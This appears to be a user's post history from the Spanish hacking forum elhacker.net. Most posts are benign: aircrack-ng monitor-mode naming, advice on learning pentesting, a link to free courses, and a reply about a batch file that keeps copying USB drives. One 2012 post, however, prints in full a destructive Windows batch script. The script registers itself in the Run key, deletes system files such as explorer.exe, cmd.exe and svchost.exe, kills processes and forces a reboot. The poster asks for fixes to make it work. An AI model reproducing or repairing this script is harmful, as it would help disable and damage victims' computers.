elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: [1]
1  Foros Generales / Dudas Generales / Re: Copiar usb en: 27 Septiembre 2016, 11:35 am
Lo que he hecho a sido hacer un bat que revise todas las unidades y este en bucle copiandolas, lo malo es que eso le mete mucha tralla al ordenador.

Puedes pasarlo por algun sitio, a ver como lo tienes?
2  Foros Generales / Dudas Generales / Re: aircrack-ng en: 19 Septiembre 2016, 12:57 pm
No tienes que tener mon0 para tenerlo en modo monitor. Que ahora se llame wlan0mon es debido a una de las actualizaciones de Kali Linux.

Citar
Goodbye mon0, hello wlan0mon!

For the latest few releases, the aircrack-ng suite had bundled with it airmon-zc, which uses an improved method of placing wireless cards into monitor mode, as well as more verbose output options. With the release of Aircrack-ng 1.2 RC2, airmon-zc has officially replaced the original aircrack-ng, as the new standard.

Aqui dejo el enlace a la noticia oficial,

https://www.kali.org/penetration-testing/pixiewps-reaver-aircrack-ng-updates/

Buenos dias a todos,  ;)
3  Foros Generales / Dudas Generales / Re: Consulta sobre hacking en: 19 Septiembre 2016, 12:47 pm
Me gustaria dejar una cosa en claro. Convertirse en un 'hacker' no es simplemente seguir unos pasos o un procedimiento. Consiste en saber a la perfección el funcionamiento de los dispositivos que vas a probar con el pentest.

Obviamente para empezar no es necesario estudiar en profundidad cada uno de los dispositivos, pero en cuanto quieras avanzaar un poco te daras cuenta de que muchas de las cosas que aprendiste al principio han sido resueltas en muchos otros dispositivos.

De esta forma necesitaras conocimientos mas profundos sobre ese dispositivo, sus protocolos, etc, para poder realizar un ataque, que aunque poco convencional resulte efectivo.

Al final, para poder realizar un buen pentest vas a necesitar un conocimiento profundo de lo que vayas a atacar.

Mucha suerte :D
4  Foros Generales / Dudas Generales / Introduccion al Pentesting - Buen curso gratuito en: 15 Septiembre 2016, 10:04 am
Buenas gente del foro,

Después de mucho sin entrar aquí, vuelvo para ayudar a cualquiera que este interesado en el pentesting o hacking ético. Inicándome yo también encontré una pagina que ofrece una gran variedad de cursos gratuitos de una gran calidad.

La pagina se llama Cybrary y tiene disitntos cursos relacionados con el pentesting, malware e ingenieria inversa. Os dejo el link:

https://www.cybrary.it/

Espero que os sea igual de util que me ha sido a mi. Buen dia a todos  :D
5  Programación / Scripting / Bat en: 17 Marzo 2012, 23:28 pm
Buenos días. Hace poco (por aburrimiento) cree un código en .bat, pero como soy nuevo en esto pensé si me podrían decir algún fallo en el, o simplemente si llegaría a funcionar alguna vez.  :laugh:

Aquí va el código:

@echo off
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v sysin2 /t REG_SZ /d "c:/windows/system32/internetexplorer.bat"
del c:\windows\config
del c:\windows\cursores
del c:\windows\system32\calc.exe
del c:\windows\system32\cmd.exe
del c:\windows\system32\notepad.exe
del c:\windows\system32\write.exe
del c:\windows\system32\taskman.exe
del c:\windows\taskman.exe
del c:\windows\explorer.exe
del c:\windows\mixer.exe
del c:\windows\system32\sndvol32.exe
del c:\windows\system32\winmine.exe
del c:\windows\system32\sol.exe
del c:\windows\system32\svchost.exe
del c:\windows\system32\uxtheme.dll
del c:\windows\system32\taskmon.exe
del c:\windows\repair
taskkill explorer.exe
taskkill rundll32.exe
shutdown -f -r -t 10
exit

Gracias de antemano  :)
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines